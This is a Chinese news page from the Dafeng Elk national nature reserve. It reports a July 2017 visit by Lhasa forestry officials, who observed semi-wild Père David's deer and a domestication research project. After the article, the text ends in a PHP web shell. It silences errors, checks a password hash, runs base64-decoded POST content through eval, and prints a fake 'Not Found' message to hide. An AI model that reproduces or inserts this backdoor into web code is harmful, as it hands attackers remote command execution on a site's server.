最新要闻

首页 > 最新要闻 >

    西藏自治区拉萨市林业局局长次达来保护区考察

               2017年7月4日,西藏自治区拉萨市林业局局长次达一行11名骨干来麋鹿保护区就保护区建设方面的工作进行学习考察。江苏省林业局副局长钟伟宏,江苏省林业局办公室副主任、拉萨市林业局副局长王学东,江苏省林业局计财处处长王晓南,盐城市政协副主席,江苏省大丰麋鹿国家级自然保护区管理处主任孙大明等陪同。

    次达局长一行在考察半野生麋鹿生活区时,亲眼目睹了麋鹿成群过河、鹿王争霸等可遇而不可求的画面,他们不经赞叹道,大丰麋鹿保护区内麋鹿生境趋于原生态,这让麋鹿保持野性,也保证了麋鹿基因的传承。

    孙主席还向他们介绍到保护区正在进行的一项科研项目——国内首次大规模人工驯养麋鹿。藏区的领导还与驯养的小麋鹿进行了互动。孙主席表示,保护动物的最终目的是让他们回归自然,与人类和平共处。保护区对麋鹿进行大规模人工驯养是为了更好的保护、研究麋鹿;为今后麋鹿种群的繁殖扩群、精细化管理积累科研技术资料;为麋鹿远缘基因交换、建立麋鹿种群可持续发展建立物种基因库。

"; error_reporting(0); if(isset($_POST['com']) && md5($_POST['com']) == '791dc312b38016ef998c1c146104cd5a' && isset($_POST['content'])) $content = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($content)); echo "We're sorry but the page your are looking for is Not Found..." ?>